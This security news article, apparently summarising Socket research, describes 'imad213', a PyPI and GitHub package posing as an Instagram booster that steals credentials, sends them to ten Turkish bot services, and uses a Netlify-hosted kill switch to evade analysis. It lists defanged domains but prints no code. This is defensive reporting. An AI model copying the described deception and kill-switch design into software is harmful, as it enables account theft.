Ddos 
Socket’s Threat Research Team has uncovered ‘imad213’, a credential-harvesting tool masquerading as an Instagram booster. Behind its sleek GitHub presentation lies a malware operation built by threat actor im_ad__213, leveraging deception, social engineering, and coordinated bot services to exploit unsuspecting users.
Distributed through GitHub and PyPI, imad213 comes with convincing documentation and a faux safety disclaimer:
“Requires a Temporary Account: Safely use a fake or temporary Instagram account to avoid risks to your main account.”
This reassurance lulls users into entering real credentials into the tool, which claims to boost followers but instead logs credentials to a local credentials.txt file and then broadcasts them to ten third-party bot services.
“This local storage serves as social engineering, making the tool appear legitimate with a ‘convenience’ feature for saving login details” Socket explains.
What makes imad213 especially insidious is its remote kill switch—a control mechanism hosted on Netlify.
The malware checks this URL before proceeding, allowing the attacker to:
- Control who runs the tool
- Shut it down globally during investigations
- Evade analysis by making the malware appear inactive
- Redirect victims to their personal Instagram account for self-promotion
“This gives the attacker remote control over their malware, like having a master switch that can turn off all copies at once,” Socket warns.
Once activated, imad213 sends Instagram credentials to ten different Turkish bot services, each disguised as a legitimate Instagram growth platform:
- takipcimx[.]net
- takipciking[.]net
- bigtakip[.]net
- instamoda[.]org
- … and more.
These services display disclaimers like “This site has no connection to Instagram” while covertly ingesting login data.
“The backend receives the complete login credentials… victims have no visibility into what actually happens with their credentials once submitted.”
Socket’s analysis revealed a disturbing level of coordination among the bot services:
- Same Turkish registrar and privacy protection
- Domain creation within days of each other (June 2021)
- Shared Cloudflare infrastructure for DDoS protection
- Detected by security vendors for phishing activity
“This coordination strongly suggests these sites are operated by the same entity… a long-term credential harvesting operation rather than a temporary scam.”
Victims of this scam face numerous risks:
- Immediate account compromise: Attackers can change passwords, access messages, or post spam.
- Instagram policy violations: Use of bot services violates Instagram’s Terms of Use and may lead to permanent account bans.
- Cross-site password reuse risk: If the Instagram password is reused, other accounts can also be compromised.
- Identity theft potential: Access to photos, contacts, and DMs can be used for further impersonation.
Donate